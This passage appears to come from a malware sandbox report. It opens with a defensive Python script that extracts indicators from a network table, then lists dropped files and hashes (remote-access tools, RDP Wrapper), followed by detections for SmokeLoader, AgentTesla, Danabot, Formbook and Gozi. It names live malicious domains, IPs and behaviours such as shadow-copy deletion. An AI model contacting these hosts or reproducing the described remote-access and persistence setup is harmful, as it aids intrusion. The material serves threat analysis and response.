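The table mixes resolver traffic (every 8.8.8.8:53 row is the sandbox's DNS forwarder) with the connections that matter: a Remote Utilities/RMS server on 5655, SMTPS on 465 to a Ukrainian freemail host, an FTP server and a stratum pool on 3333 reached by bare IP with no DNS lookup at all. The 3333 destination is the pool named on the MicrosoftHost.exe command line above, and the 5655 connection to rms-server.tektonit.ru is consistent with the rutserv.exe/rfusclient.exe files listed below. The script that follows is an added example, not part of this report: it parses the table as printed and produces the view a responder records. The table text is copied verbatim from above; the row regex, the resolver filter and the port-role table (5655 as the Remote Utilities default) are this example's assumptions.

```python
"""Parse the sandbox Network table into an indicator view (added example, not part of this report).

The table text is copied from the Network section above; the row regex, the port-role
table and the resolver filter are this example's assumptions.
"""
import re
from collections import defaultdict

# Constructed sample: the Network table above, verbatim, header included.
NETWORK_TABLE = """\
Country Destination Domain Proto
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 stcubegames.netxi.in udp
UA 185.143.145.9:80 stcubegames.netxi.in tcp
US 8.8.8.8:53 rms-server.tektonit.ru udp
RU 77.223.119.187:5655 rms-server.tektonit.ru tcp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 freemail.freehost.com.ua udp
UA 194.0.200.251:465 freemail.freehost.com.ua tcp
US 8.8.8.8:53 stcubegames.netxi.in udp
US 8.8.8.8:53 iplogger.org udp
UA 185.143.145.9:80 stcubegames.netxi.in tcp
US 104.26.2.46:443 iplogger.org tcp
US 8.8.8.8:53 c.pki.goog udp
DE 142.250.184.195:80 c.pki.goog tcp
US 8.8.8.8:53 taskhostw.com udp
RU 152.89.218.85:80 taskhostw.com tcp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.110.133:443 raw.githubusercontent.com tcp
RU 109.248.203.81:21 tcp
US 185.199.110.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 c.pki.goog udp
DE 142.250.184.195:80 c.pki.goog tcp
RU 185.139.69.167:3333 tcp
"""

# A row is: country, ip:port, optional domain, proto. Rows with no domain have only four fields.
ROW = re.compile(
    r"^(?P<cc>[A-Z]{2})\s+(?P<ip>\d{1,3}(?:\.\d{1,3}){3}):(?P<port>\d+)"
    r"\s+(?:(?P<domain>\S+)\s+)?(?P<proto>tcp|udp)$"
)

RESOLVER = "8.8.8.8"        # the sandbox's DNS forwarder, not an indicator
WEB_PORTS = {80, 443}
# Assumed service roles for the non-web ports seen; 5655 is the Remote Utilities (RMS) default.
PORT_ROLE = {21: "ftp", 53: "dns", 465: "smtps", 3333: "stratum mining pool", 5655: "Remote Utilities/RMS"}


def parse_network_table(text):
    """Return one dict per data row; the header and anything unparseable is skipped."""
    rows = []
    for line in text.splitlines():
        m = ROW.match(line.strip())
        if m:
            rows.append({"cc": m["cc"], "ip": m["ip"], "port": int(m["port"]),
                         "domain": m["domain"], "proto": m["proto"]})
    return rows


def summarise(rows):
    """Build what a responder records: name->IP map, unique destinations, direct-IP and non-web contacts."""
    resolved = defaultdict(set)
    for r in rows:
        if r["proto"] == "tcp" and r["domain"]:
            resolved[r["domain"]].add(r["ip"])
    queried = {r["domain"] for r in rows if r["proto"] == "udp" and r["port"] == 53 and r["domain"]}
    destinations = sorted({(r["ip"], r["port"]) for r in rows if r["ip"] != RESOLVER})
    named_ips = {ip for ips in resolved.values() for ip in ips}
    return {
        "resolved": {d: sorted(ips) for d, ips in resolved.items()},
        "queried_only": sorted(queried - set(resolved)),      # looked up but never connected to
        "destinations": destinations,
        "noteworthy": [(ip, port, PORT_ROLE.get(port, "unknown"))
                       for ip, port in destinations if port not in WEB_PORTS],
        "bare_ips": sorted({ip for ip, _ in destinations if ip not in named_ips}),  # no DNS at all
    }


if __name__ == "__main__":
    summary = summarise(parse_network_table(NETWORK_TABLE))
    for key, value in summary.items():
        print(key, value)
```

"bare_ips" is the field to look at first: a host that opens TCP to an address it never resolved is running with a hard-coded C2, pool or exfiltration endpoint, and those two entries (the FTP server and the stratum pool) can be blocked at the perimeter without waiting for the domain-based indicators to be confirmed.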

Files

C:\Users\Admin\AppData\Local\Temp\aut7AF1.tmp

MD5 098d7cf555f2bafd4535c8c245cf5e10
SHA1 b45daf862b6cbb539988476a0b927a6b8bb55355
SHA256 01e043bc0d9a8d53b605b1c7c2b05a5ceab0f8547222d37edd47f7c5ccde191a
SHA512 e57b8a48597bf50260c0427468a67b6b9ee5a26fd581644cd53cef5f13dc3e743960c0968cb7e5e5dff186273b75a1c6e133d26ef26320fffabc36b249fbc624

C:\ProgramData\Windows\winit.exe

MD5 aaf3eca1650e5723d5f5fb98c76bebce
SHA1 2fa0550949a5d775890b7728e61a35d55adb19dd
SHA256 946b1c407144816c750e90cdf1bf253a4718e18b180a710b0408b4944e8f7d4f
SHA512 1cb6c141fc80a0c1015050e83c6e9e5787d2ac0240065cc656c3f2a7bacaa27c89347b7d03f227525f3895990bd6b14abcb3a5a95fcf20cd901a5da96965dd6b

C:\ProgramData\Windows\install.vbs

MD5 5e36713ab310d29f2bdd1c93f2f0cad2
SHA1 7e768cca6bce132e4e9132e8a00a1786e6351178
SHA256 cd8df8b0c43c36aabb0a960e4444b000a04eb513f0b34e12dbfd098944e40931
SHA512 8e5cf90470163143aee75b593e52fcc39e6477cd69a522ee77fa2589ea22b8a3a1c23614d3a677c8017fba0bf4b320a4e47c56a9a7f176dbf51db88d9d8e52c1

C:\Programdata\Windows\install.bat

MD5 db76c882184e8d2bac56865c8e88f8fd
SHA1 fc6324751da75b665f82a3ad0dcc36bf4b91dfac
SHA256 e3db831cdb021d6221be26a36800844e9af13811bac9e4961ac21671dff9207a
SHA512 da3ca7a3429bb9250cc8b6e33f25b5335a5383d440b16940e4b6e6aca82f2b673d8a01419606746a8171106f31c37bfcdb5c8e33e57fce44c8edb475779aea92

C:\ProgramData\Windows\reg1.reg

MD5 0bfedf7b7c27597ca9d98914f44ccffe
SHA1 e4243e470e96ac4f1e22bf6dcf556605c88faaa9
SHA256 7e9541d21f44024bc88b9dc0437b18753b9d9f22b0cf6e01bb7e9bf5b32add9e
SHA512 d7669937f24b3dbb0fdfd19c67d9cdbd4f90779539107bd4b84d48eab25293ef03661a256fe5c662e73041b1436baff0570ace763fa3effa7c71d954378cbc2d

C:\ProgramData\Windows\reg2.reg

MD5 6a5d2192b8ad9e96a2736c8b0bdbd06e
SHA1 235a78495192fc33f13af3710d0fe44e86a771c9
SHA256 4ae04a85412ec3daa0fb33f21ed4eb3c4864c3668b95712be9ec36ef7658422a
SHA512 411204a0a1cdbe610830fb0be09fd86c579bb5cccf46e2e74d075a5693fe7924e1e2ba121aa824af66c7521fcc452088b2301321d9d7eb163bee322f2f58640d

C:\ProgramData\Windows\rutserv.exe

MD5 37a8802017a212bb7f5255abc7857969
SHA1 cb10c0d343c54538d12db8ed664d0a1fa35b6109
SHA256 1699b9b4fc1724f9b0918b57ca58c453829a3935efd89bd4e9fa66b5e9f2b8a6
SHA512 4e20141da8ea4499daf8be5cc41b664dc4229e9575765caf6dc5873d8d0a09f9e200988e1404e767d0415005876a4cf38d5737bd3e1b2c12c4a8fb28adb4f0a0

memory/5764-69-0x0000000000400000-0x0000000000AB9000-memory.dmp

memory/5764-70-0x0000000000400000-0x0000000000AB9000-memory.dmp

memory/5764-72-0x0000000000400000-0x0000000000AB9000-memory.dmp

memory/5764-73-0x0000000000400000-0x0000000000AB9000-memory.dmp

memory/5764-71-0x0000000000400000-0x0000000000AB9000-memory.dmp

memory/5764-74-0x0000000000400000-0x0000000000AB9000-memory.dmp

memory/5764-76-0x0000000000400000-0x0000000000AB9000-memory.dmp

memory/4560-78-0x0000000000400000-0x0000000000AB9000-memory.dmp

memory/4560-82-0x0000000000400000-0x0000000000AB9000-memory.dmp

memory/4560-81-0x0000000000400000-0x0000000000AB9000-memory.dmp

C:\ProgramData\install\sys.exe

MD5 bfa81a720e99d6238bc6327ab68956d9
SHA1 c7039fadffccb79534a1bf547a73500298a36fa0
SHA256 222a8bb1b3946ff0569722f2aa2af728238778b877cebbda9f0b10703fc9d09f
SHA512 5ba1fab68a647e0a0b03d8fba5ab92f4bdec28fb9c1657e1832cfd54ee7b5087ce181b1eefce0c14b603576c326b6be091c41fc207b0068b9032502040d18bab

memory/4560-79-0x0000000000400000-0x0000000000AB9000-memory.dmp

memory/4560-80-0x0000000000400000-0x0000000000AB9000-memory.dmp

memory/4560-92-0x0000000000400000-0x0000000000AB9000-memory.dmp

memory/4620-94-0x0000000000400000-0x0000000000AB9000-memory.dmp

memory/4620-97-0x0000000000400000-0x0000000000AB9000-memory.dmp

memory/4620-98-0x0000000000400000-0x0000000000AB9000-memory.dmp

memory/4620-96-0x0000000000400000-0x0000000000AB9000-memory.dmp

memory/4620-99-0x0000000000400000-0x0000000000AB9000-memory.dmp

memory/5320-102-0x0000000000400000-0x0000000000AB9000-memory.dmp

memory/5320-103-0x0000000000400000-0x0000000000AB9000-memory.dmp

memory/5320-106-0x0000000000400000-0x0000000000AB9000-memory.dmp

memory/5320-105-0x0000000000400000-0x0000000000AB9000-memory.dmp

C:\ProgramData\Windows\rfusclient.exe

MD5 b8667a1e84567fcf7821bcefb6a444af
SHA1 9c1f91fe77ad357c8f81205d65c9067a270d61f0
SHA256 dc9d875e659421a51addd8e8a362c926369e84320ab0c5d8bbb1e4d12d372fc9
SHA512 ec6af663a3b41719d684f04504746f91196105ef6f8baa013b4bd02df6684eca49049d5517691f8e3a4ba6351fe35545a27f728b1d29d949e950d574a012f852

C:\ProgramData\Windows\vp8encoder.dll

MD5 6298c0af3d1d563834a218a9cc9f54bd
SHA1 0185cd591e454ed072e5a5077b25c612f6849dc9
SHA256 81af82019d9f45a697a8ca1788f2c5c0205af9892efd94879dedf4bc06db4172
SHA512 389d89053689537cdb582c0e8a7951a84549f0c36484db4346c31bdbe7cb93141f6a354069eb13e550297dc8ec35cd6899746e0c16abc876a0fe542cc450fffe

memory/5172-116-0x0000000000400000-0x00000000009B6000-memory.dmp

memory/5172-113-0x0000000000400000-0x00000000009B6000-memory.dmp

memory/5172-112-0x0000000000400000-0x00000000009B6000-memory.dmp

C:\ProgramData\Windows\vp8decoder.dll

MD5 88318158527985702f61d169434a4940
SHA1 3cc751ba256b5727eb0713aad6f554ff1e7bca57
SHA256 4c04d7968a9fe9d9258968d3a722263334bbf5f8af972f206a71f17fa293aa74
SHA512 5d88562b6c6d2a5b14390512712819238cd838914f7c48a27f017827cb9b825c24ff05a30333427acec93cd836e8f04158b86d17e6ac3dd62c55b2e2ff4e2aff

memory/5172-117-0x0000000000400000-0x00000000009B6000-memory.dmp

memory/3336-120-0x0000000000400000-0x00000000009B6000-memory.dmp

memory/4620-124-0x0000000000400000-0x0000000000AB9000-memory.dmp

memory/3336-123-0x0000000000400000-0x00000000009B6000-memory.dmp

memory/3336-122-0x0000000000400000-0x00000000009B6000-memory.dmp

memory/3336-119-0x0000000000400000-0x00000000009B6000-memory.dmp

memory/3336-121-0x0000000000400000-0x00000000009B6000-memory.dmp

memory/5172-114-0x0000000000400000-0x00000000009B6000-memory.dmp

memory/3336-118-0x0000000000400000-0x00000000009B6000-memory.dmp

memory/5172-115-0x0000000000400000-0x00000000009B6000-memory.dmp

memory/5320-104-0x0000000000400000-0x0000000000AB9000-memory.dmp

memory/5320-101-0x0000000000400000-0x0000000000AB9000-memory.dmp

memory/4620-95-0x0000000000400000-0x0000000000AB9000-memory.dmp

memory/4660-126-0x0000000000400000-0x0000000000420000-memory.dmp

memory/5320-130-0x0000000000400000-0x0000000000AB9000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\autCA55.tmp

MD5 398a9ce9f398761d4fe45928111a9e18
SHA1 caa84e9626433fec567089a17f9bcca9f8380e62
SHA256 e376f2a9dda89354311b1064ea4559e720739d526ef7da0518ebfd413cd19fc1
SHA512 45255ffea86db71fcfcde1325b54d604a19276b462c8cca92cf5233a630510484a0ecb4d3e9f66733e2127c30c869c23171249cfac3bb39ff4e467830cd4b26b

memory/5172-141-0x0000000000400000-0x00000000009B6000-memory.dmp

memory/3336-142-0x0000000000400000-0x00000000009B6000-memory.dmp

memory/5380-144-0x0000000000400000-0x00000000009B6000-memory.dmp

memory/5380-149-0x0000000000400000-0x00000000009B6000-memory.dmp

memory/5380-148-0x0000000000400000-0x00000000009B6000-memory.dmp

memory/5380-147-0x0000000000400000-0x00000000009B6000-memory.dmp

memory/5380-146-0x0000000000400000-0x00000000009B6000-memory.dmp

memory/5380-145-0x0000000000400000-0x00000000009B6000-memory.dmp

memory/5380-151-0x0000000000400000-0x00000000009B6000-memory.dmp

C:\ProgramData\install\cheat.exe

MD5 0d18b4773db9f11a65f0b60c6cfa37b7
SHA1 4d4c1fe9bf8da8fe5075892d24664e70baf7196e
SHA256 e3d02b5bfcab47b86a2366ef37c3c872858b2e25ad5c5a4d1a5e49c2afaee673
SHA512 a607cf5d9dd1c7d8571a9e53fb65255b7c698c08e4f1115650ee08c476a0a7b75627a5b8cd93d8839a750def62dee465e6b947ecf4b875eda5d5e0cb9141a02c

C:\ProgramData\Microsoft\Intel\taskhost.exe

MD5 5cf0195be91962de6f58481e15215ddd
SHA1 7b2c9fbd487b38806ab09d75cc1db1cde4b6f6f6
SHA256 0b452348f0e900c8a09eb41529d2834dc2d113450a084bdb382ace73b9a75e6d
SHA512 0df9f28618f3d46fd515f89e4ef3bc93350cdf4f40132ccb903ca55ec8abda4f71f3ae0b29a4d62b4f49b9e0dbf13dba8cf0b6e24584c41c54ddda00898c86d4

C:\Programdata\RealtekHD\taskhostw.exe

MD5 73ca737af2c7168e9c926a27abf7a5b1
SHA1 05fd828fd58a64f25682845585f6565b7ca2fdb2
SHA256 99dec75b66a048341192c2baae3fe2c47fca801a21ca759bbb127908f97d11e2
SHA512 de42f9ef047b888da7379b685a3de7fa0935e3409d9d74bb67ea982dae78c21796985b6e5385875c157d715ee2909f72c419afa6e7c1e8632a8830ee3ea9c172

C:\Windows\SysWOW64\drivers\conhost.exe

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Temp\autEDDA.tmp

MD5 ec0f9398d8017767f86a4d0e74225506
SHA1 720561ad8dd165b8d8ad5cbff573e8ffd7bfbf36
SHA256 870ff02d42814457290c354229b78232458f282eb2ac999b90c7fcea98d16375
SHA512 d2c94614f3db039cbf3cb6ffa51a84d9d32d58cccabed34bf3c8927851d40ec3fc8d18641c2a23d6a5839bba264234b5fa4e9c5cb17d3205f6af6592da9b2484

memory/5320-202-0x0000000000400000-0x0000000000AB9000-memory.dmp

memory/5116-205-0x00000000007E0000-0x00000000008CC000-memory.dmp

memory/3336-204-0x0000000000400000-0x00000000009B6000-memory.dmp

memory/5172-203-0x0000000000400000-0x00000000009B6000-memory.dmp

C:\ProgramData\Microsoft\Intel\R8.exe

MD5 ad95d98c04a3c080df33ed75ad38870f
SHA1 abbb43f7b7c86d7917d4582e47245a40ca3f33c0
SHA256 40d4931bbb3234a2e399e2e3e0dcfe4b7b05362c58d549569f2888d5b210ebbd
SHA512 964e93aeec90ce5ddaf0f6440afb3ed27523dfcddcdfd4574b62ef32763cb9e167691b33bfc2e7b62a98ff8df2070bf7ae53dafc93a52ed6cbe9c2ca1563c5ed

C:\rdp\run.vbs

MD5 6a5f5a48072a1adae96d2bd88848dcff
SHA1 b381fa864db6c521cbf1133a68acf1db4baa7005
SHA256 c7758bb2fdf207306a5b83c9916bfffcc5e85efe14c8f00d18e2b6639b9780fe
SHA512 d11101b11a95d39a2b23411955e869f92451e1613b150c15d953cccf0f741fb6c3cf082124af8b67d4eb40feb112e1167a1e25bdeab9e433af3ccc5384ccb90c

C:\rdp\pause.bat

MD5 a47b870196f7f1864ef7aa5779c54042
SHA1 dcb71b3e543cbd130a9ec47d4f847899d929b3d2
SHA256 46565c0588b170ae02573fde80ba9c0a2bfe3c6501237404d9bd105a2af01cba
SHA512 b8da14068afe3ba39fc5d85c9d62c206a9342fb0712c115977a1724e1ad52a2f0c14f3c07192dce946a15b671c5d20e35decd2bfb552065e7c194a2af5e9ca60

memory/5116-228-0x00000000007E0000-0x00000000008CC000-memory.dmp

C:\rdp\Rar.exe

MD5 2e86a9862257a0cf723ceef3868a1a12
SHA1 a4324281823f0800132bf13f5ad3860e6b5532c6
SHA256 2356220cfa9159b463d762e2833f647a04fa58b4c627fcb4fb1773d199656ab8
SHA512 3a8e0389637fc8a3f8bab130326fe091ead8c0575a1a3861622466d4e3c37818c928bc74af4d14b5bb3080dfae46e41fee2c362a7093b5aa3b9df39110c8e9de

C:\rdp\db.rar

MD5 462f221d1e2f31d564134388ce244753
SHA1 6b65372f40da0ca9cd1c032a191db067d40ff2e3
SHA256 534e0430f7e8883b352e7cba4fa666d2f574170915caa8601352d5285eee5432
SHA512 5e4482a0dbe01356ef0cf106b5ee4953f0de63c24a91b5f217d11da852e3e68fc254fa47c589038883363b4d1ef3732d7371de6117ccbf33842cee63afd7f086

C:\rdp\install.vbs

MD5 6d12ca172cdff9bcf34bab327dd2ab0d
SHA1 d0a8ba4809eadca09e2ea8dd6b7ddb60e68cd493
SHA256 f797d95ce7ada9619afecde3417d0f09c271c150d0b982eaf0e4a098efb4c5ec
SHA512 b840afa0fe254a8bb7a11b4dd1d7da6808f8b279e3bed35f78edcb30979d95380cfbfc00c23a53bec83fe0b4e45dcba34180347d68d09d02347672142bf42342

C:\rdp\bat.bat

MD5 5835a14baab4ddde3da1a605b6d1837a
SHA1 94b73f97d5562816a4b4ad3041859c3cfcc326ea
SHA256 238c063770f3f25a49873dbb5fb223bba6af56715286ed57a7473e2da26d6a92
SHA512 d874d35a0446990f67033f5523abe744a6bc1c7c9835fcaea81217dac791d34a9cc4d67741914026c61384f5e903092a2b291748e38d44a7a6fd9ec5d6bba87e

C:\rdp\RDPWInst.exe

MD5 3288c284561055044c489567fd630ac2
SHA1 11ffeabbe42159e1365aa82463d8690c845ce7b7
SHA256 ac92d4c6397eb4451095949ac485ef4ec38501d7bb6f475419529ae67e297753
SHA512 c25b28a340a23a9fa932aa95075f85fdd61880f29ef96f5179097b652f69434e0f1f8825e2648b2a0de1f4b0f9b8373080a22117974fcdf44112906d330fca02

memory/4660-262-0x0000000000400000-0x0000000000420000-memory.dmp

\??\c:\program files\rdp wrapper\rdpwrap.dll

MD5 461ade40b800ae80a40985594e1ac236
SHA1 b3892eef846c044a2b0785d54a432b3e93a968c8
SHA256 798af20db39280f90a1d35f2ac2c1d62124d1f5218a2a0fa29d87a13340bd3e4
SHA512 421f9060c4b61fa6f4074508602a2639209032fd5df5bfc702a159e3bad5479684ccb3f6e02f3e38fb8db53839cf3f41fe58a3acad6ec1199a48dc333b2d8a26

\??\c:\program files\rdp wrapper\rdpwrap.ini

MD5 dddd741ab677bdac8dcd4fa0dda05da2
SHA1 69d328c70046029a1866fd440c3e4a63563200f9
SHA256 7d5655d5ec4defc2051aa5f582fac1031b142040c8eea840ff88887fe27b7668
SHA512 6106252c718f7ca0486070c6f6c476bd47e6ae6a799cffd3fb437a5ce2b2a904e9cbe17342351353c594d7a8ae0ef0327752ff977dee1e69f0be7dc8e55cf4ec

memory/5320-270-0x0000000000400000-0x0000000000AB9000-memory.dmp

memory/3336-272-0x0000000000400000-0x00000000009B6000-memory.dmp

memory/4288-275-0x0000000000400000-0x000000000056F000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E

MD5 1c0cf8684d41013e0925867166761c7a
SHA1 9524e385e849826dc043877b0afb4d6e8eda31c5
SHA256 b8661aa092f31eaac8538f277f91236f7d29a0584c5eb6e1674a6a246db7cd05
SHA512 fd285d8c87463fa34bc3c5b02ec31a20ccaf18be9d1a1ee42f404c62d4d2463a0de8ca66afcc3e9353a26ca5d99514942eea7d08e76ac0dfe01131adf20adcdb

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D

MD5 3ff7b392654e1b317109930965efb642
SHA1 2e0c1443b70144d86f142ca32b3017fa7c2ef265
SHA256 8d7626d9ecab01f2b0d5436db42a17eda8e0b2dd8306f5cc22b210c8ba37d6d4
SHA512 2f0155510f3f556b9a6bcdf9deb698afc4801e56d0b399c9ba264406d6ad7ef04aec4e08e4b39b6835a3dac7589efe8dce2713042338c8631a229c877ad5f410

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D

MD5 60abd7b376910582392bf5896e2f5b61
SHA1 b81deecc59e56c32e5c36f8a739d627b7d402a3e
SHA256 5edbbcdee0a16baccefc513e15bbf9f2b5ca1dba861d0afbe704b6b26edeae5c
SHA512 78b0c49bff64d0dcd31966dd0bb42e5099a39a277d0fe1b61506417e1cb0f511044daed2f9d12e6568ef83610084ae98bf90f8b0dc16c45c5014518c10cb7290

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E

MD5 7143aa5e17d925354925d633f89b59b8
SHA1 ec2296a2cb3422d9c294e48cba497b419277cdb6
SHA256 667bac6cce827f155dc21906b80727fc9a04054d7b418c990061cfdbe97657b5
SHA512 51b7c2a31271d13bd047930361c1d2b625f243d3d193fd484d313d813819c4f4c22b5ac8537e461e3fead8104b7b5c04faa9ad8e34994c25a67501af3268c2d9

memory/2688-282-0x0000000000400000-0x000000000056F000-memory.dmp

memory/5320-299-0x0000000000400000-0x0000000000AB9000-memory.dmp

memory/4660-302-0x0000000000400000-0x0000000000420000-memory.dmp

memory/5320-315-0x0000000000400000-0x0000000000AB9000-memory.dmp

memory/3336-317-0x0000000000400000-0x00000000009B6000-memory.dmp

memory/2120-324-0x000001F4CE5E0000-0x000001F4CE5F0000-memory.dmp

memory/5320-353-0x0000000000400000-0x0000000000AB9000-memory.dmp

memory/3336-354-0x0000000000400000-0x00000000009B6000-memory.dmp

Analysis: behavioral27

Detonation Overview

Submitted

2025-05-04 05:10

Reported

2025-05-04 05:15

Platform

win10v2004-20250502-en

Max time kernel

100s

Max time network

120s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Lonelyscreen.1.2.9.keygen.by.Paradox.exe"

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Lonelyscreen.1.2.9.keygen.by.Paradox.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Lonelyscreen.1.2.9.keygen.by.Paradox.exe

"C:\Users\Admin\AppData\Local\Temp\Lonelyscreen.1.2.9.keygen.by.Paradox.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 c.pki.goog udp
DE 142.250.184.195:80 c.pki.goog tcp

Files

N/A

Analysis: behavioral3

Detonation Overview

Submitted

2025-05-04 05:10

Reported

2025-05-04 05:15

Platform

win10v2004-20250502-en

Max time kernel

102s

Max time network

115s

Command Line

"C:\Users\Admin\AppData\Local\Temp\0di3x.exe"

Signatures

SmokeLoader

trojan backdoor smokeloader

Smokeloader family

smokeloader

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\0di3x.exe N/A

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\0di3x.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\0di3x.exe N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\0di3x.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\0di3x.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\0di3x.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\0di3x.exe

"C:\Users\Admin\AppData\Local\Temp\0di3x.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 3424 -ip 3424

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3424 -s 380

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 150.171.27.10:443 g.bing.com tcp
GB 88.221.135.25:443 www.bing.com tcp
US 8.8.8.8:53 c.pki.goog udp
DE 142.250.184.195:80 c.pki.goog tcp

Files

memory/3424-1-0x0000000003170000-0x0000000003270000-memory.dmp

memory/3424-2-0x0000000003100000-0x000000000310A000-memory.dmp

memory/3424-3-0x0000000000400000-0x000000000040A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\2F6.tmp

MD5 4f3387277ccbd6d1f21ac5c07fe4ca68
SHA1 e16506f662dc92023bf82def1d621497c8ab5890
SHA256 767a3fc4a7a6818cdc3f0b99aaa95db694f6bcde719d2057a88b3d4df3d74fac
SHA512 9da199ac69e3c0d4e0c6307e0ab8178f12cc25cb2f14c3511f6b64e6e60a925c860f3263cb38353a97b55a71ef4d27f8cb7fa3cfc08e7c1a349fd8d209dfa219

memory/3424-10-0x0000000000400000-0x000000000040A000-memory.dmp

memory/3424-9-0x0000000003100000-0x000000000310A000-memory.dmp

memory/3424-8-0x0000000000400000-0x0000000002FA6000-memory.dmp

Analysis: behavioral5

Detonation Overview

Submitted

2025-05-04 05:10

Reported

2025-05-04 05:15

Platform

win10v2004-20250502-en

Max time kernel

102s

Max time network

115s

Command Line

"C:\Users\Admin\AppData\Local\Temp\2019-09-02_22-41-10.exe"

Signatures

SmokeLoader

trojan backdoor smokeloader

Smokeloader family

smokeloader

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\2019-09-02_22-41-10.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2068 set thread context of 3908 N/A C:\Users\Admin\AppData\Local\Temp\2019-09-02_22-41-10.exe C:\Users\Admin\AppData\Local\Temp\2019-09-02_22-41-10.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\2019-09-02_22-41-10.exe N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\2019-09-02_22-41-10.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\2019-09-02_22-41-10.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\2019-09-02_22-41-10.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\2019-09-02_22-41-10.exe

"C:\Users\Admin\AppData\Local\Temp\2019-09-02_22-41-10.exe"

C:\Users\Admin\AppData\Local\Temp\2019-09-02_22-41-10.exe

"C:\Users\Admin\AppData\Local\Temp\2019-09-02_22-41-10.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 c.pki.goog udp
DE 142.250.184.195:80 c.pki.goog tcp

Files

memory/2068-1-0x0000000000C90000-0x0000000000D90000-memory.dmp

memory/2068-2-0x0000000000A10000-0x0000000000A1B000-memory.dmp

memory/3908-4-0x0000000000400000-0x000000000040A000-memory.dmp

memory/3908-3-0x0000000000400000-0x000000000040A000-memory.dmp

memory/3908-8-0x0000000000400000-0x000000000040A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\D47F.tmp

MD5 4f3387277ccbd6d1f21ac5c07fe4ca68
SHA1 e16506f662dc92023bf82def1d621497c8ab5890
SHA256 767a3fc4a7a6818cdc3f0b99aaa95db694f6bcde719d2057a88b3d4df3d74fac
SHA512 9da199ac69e3c0d4e0c6307e0ab8178f12cc25cb2f14c3511f6b64e6e60a925c860f3263cb38353a97b55a71ef4d27f8cb7fa3cfc08e7c1a349fd8d209dfa219

Analysis: behavioral7

Detonation Overview

Submitted

2025-05-04 05:10

Reported

2025-05-04 05:15

Platform

win10v2004-20250502-en

Max time kernel

17s

Max time network

155s

Command Line

C:\Windows\Explorer.EXE

Signatures

AgentTesla

keylogger trojan stealer spyware agenttesla

Agenttesla family

agenttesla

Danabot

trojan banker danabot

Danabot family

danabot

Danabot x86 payload

botnet
Description Indicator Process Target
N/A N/A N/A N/A

Formbook

trojan spyware stealer formbook

Formbook family

formbook

Gozi

banker trojan gozi

Gozi family

gozi

AgentTesla payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

CryptOne packer

cryptone packer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Deletes shadow copies

ransomware defense_evasion impact execution

Formbook payload

rat
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
